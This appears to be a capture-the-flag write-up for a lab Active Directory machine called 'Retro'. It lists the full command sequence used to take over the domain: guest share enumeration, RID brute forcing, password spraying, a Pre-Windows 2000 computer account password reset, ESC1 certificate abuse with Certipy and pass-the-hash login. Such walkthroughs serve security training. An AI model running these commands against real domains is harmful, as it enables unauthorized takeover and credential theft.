Retro is an easy difficulty machine where I had to enumerate open ports and services, leverage LDAP and SMB services to gain initial access, utilize credential brute forcing to discover simple passwords, and employ Impacket and Certipy to change credentials and exploit an ESC1 vulnerability for privilege escalation. The final step involved obtaining a TGT for the administrator to capture the root flag.

Enumeration

The Nmap scan shows the following ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PORT      STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
9389/tcp open adws

Guest login is enabled in the machine and I can see the shares using a username and null password.
netexec smb ip -u 'sz' -p '' --shares

I also used rid brute force to get users into the system.
netexec smb ip -u 'sz' -p '' --rid-brute

Password Guessing

In the Trainees shares there is a text file where it talks about making an simple password for trainees.

smbclient "//10.10.81.244/Trainees" -U "sz" --password=''

1
2
3
4
5
6
7
Dear Trainees,     
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards
The Admins

Using the usernames earlier I can tried bruteforce with usernames as password and got trainees:trainees valid

netexec smb 10.10.81.244 -u user.txt -p user.txt -no-bruteforce

Pre-Windows 2000 Computers

I explored Notes share with trainee credentials and found another notes where it talked about Pre Created Computer Account
smbclient "//10.10.81.244/Notes" -U "trainee" --password='trainee'

1
2
3
4
5
6
7
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created computer account. That one is older than me.

Best
James

After researching for a little bit I found this 2 article where it talked about how I can change the credentials of Pre-Windows 2000 Computers.

The Hacker Recipes
Trustedsec

As this is a financial department I used previously found user banking and got NT_STATUS_RESOURCE_NAME_NOT_FOUND which confirms its vulnerable.

smbclient -W retro.vl -U "banking" --password='banking' -L retro.vl

I also verified it with Netexec.

Next, I used Impacket to change the credentials and also create alternative credentials.

impacket-changepasswd retro.vl/banking$:[email protected] -newpass Password123 -altuser trainee -altpass trainee

ESC1

Using the new credential I enumerated ADCS and the machine was vulnerable to ESC1 attack.

certipy find -u 'banking$' -p 'Password123' -dc-ip 10.10.105.52 -enabled -vulnerable -stdout

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Certificate Templates                   
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1

Using Certipy I requested .pfx key using the vulnerable template. Because of the Key Size error, I specified the key-size

certipy req -u 'banking$'@retro.vl -p 'Password123' -dc-ip 10.10.105.52 -ca retro-DC-CA -template RetroClients -upn [email protected] -key-size 4096

Next, Using the pfx key I requested TGT of the administrator.

certipy auth -pfx administrator.pfx -username Administrator -domain retro.vl -dc-ip 10.10.105.52

Using the TGT I can now login to the machine and get the flag.
wmiexec.py [email protected] -hashes <.....redacted......>